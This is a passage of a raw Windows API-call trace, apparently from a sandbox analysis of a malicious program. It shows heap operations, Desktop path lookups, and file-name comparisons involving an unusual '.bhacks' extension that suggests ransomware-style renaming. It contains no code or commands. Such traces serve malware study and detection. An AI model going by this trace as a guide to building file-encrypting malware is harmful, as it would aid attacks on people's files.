(Locale=0x400, dwCmpFlags=0x1, lpString1="hacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0101.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0101.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0101.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0101.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0101.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0101.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0101.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0101.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0101.731] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0101.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0101.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0101.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0101.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0101.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0101.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0101.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0101.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0101.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0101.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0101.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0101.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0101.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0101.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0101.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0101.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0101.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0101.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0101.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x3c) returned 0x2a5de40 [0101.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0101.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="J_gUxI4K04bkqo7tW4.avi.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0101.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_gUxI4K04bkqo7tW4.avi.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0101.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gUxI4K04bkqo7tW4.avi.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0101.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UxI4K04bkqo7tW4.avi.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0101.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xI4K04bkqo7tW4.avi.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0101.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="I4K04bkqo7tW4.avi.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0101.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4K04bkqo7tW4.avi.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0101.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K04bkqo7tW4.avi.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0101.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="04bkqo7tW4.avi.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0101.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4bkqo7tW4.avi.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0101.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bkqo7tW4.avi.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0101.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kqo7tW4.avi.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0101.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qo7tW4.avi.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0101.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o7tW4.avi.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0101.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7tW4.avi.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0101.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tW4.avi.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0101.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="W4.avi.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0101.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4.avi.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0101.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".avi.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0101.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avi.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0101.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vi.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0101.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0101.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0101.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0101.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0101.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0101.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0101.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0101.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0101.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0101.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0101.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0101.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0101.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0101.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0101.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0101.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0101.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a698b0 | out: hHeap=0x2af0000) returned 1 [0101.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0101.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0101.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0101.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0101.733] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0101.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0101.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71db8 [0101.733] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0101.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0101.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0101.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0101.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71db8 [0101.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0101.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0101.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0101.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0101.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0101.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0101.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0101.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0101.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0101.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71f88 [0101.734] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0101.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0101.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0101.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92e0 [0101.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0101.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0101.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa90b8 [0101.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0101.734] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf3a8 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0101.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0101.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa65d8 [0101.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71e88 [0101.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0101.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0101.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0101.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0101.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0101.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0101.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0101.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0101.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0101.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0101.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71eb8 [0101.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0101.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0101.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75948 [0101.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa65d8 | out: hHeap=0x2af0000) returned 1 [0101.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0101.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0101.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0101.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0101.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0101.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0101.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0101.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0101.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ea8 [0101.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0101.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0101.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0101.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0101.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0101.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0101.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0101.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0101.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71f88 [0101.735] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0101.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0101.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0101.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9220 [0101.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0101.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0101.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9268 [0101.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71eb8 [0101.736] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf3a8 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0101.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0101.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6488 [0101.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ec8 [0101.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0101.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0101.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0101.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0101.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0101.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0101.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0101.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0101.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0101.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0101.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71eb8 [0101.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70c0 [0101.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0101.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x2a68440 [0101.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6488 | out: hHeap=0x2af0000) returned 1 [0101.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0101.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0101.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0101.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70c0 | out: hHeap=0x2af0000) returned 1 [0101.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0101.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0101.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71f88 [0101.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0101.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0101.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0101.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0101.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71eb8 [0101.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0101.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0101.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0101.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9058 [0101.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0101.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0101.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71de8 [0101.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0101.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0101.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0101.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0101.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0101.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0101.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71fe8 [0101.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0101.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0101.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0101.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0101.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0101.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0101.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720d8 [0101.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0101.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0101.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0101.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0101.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0101.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0101.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72028 [0101.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0101.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0101.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0101.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0101.738] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720e8 [0101.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72088 [0101.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0101.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0101.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72098 [0101.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0101.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0101.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72098 [0101.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0101.738] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0101.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0101.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0101.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0101.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0101.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0101.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0101.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0101.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0101.739] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0101.739] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 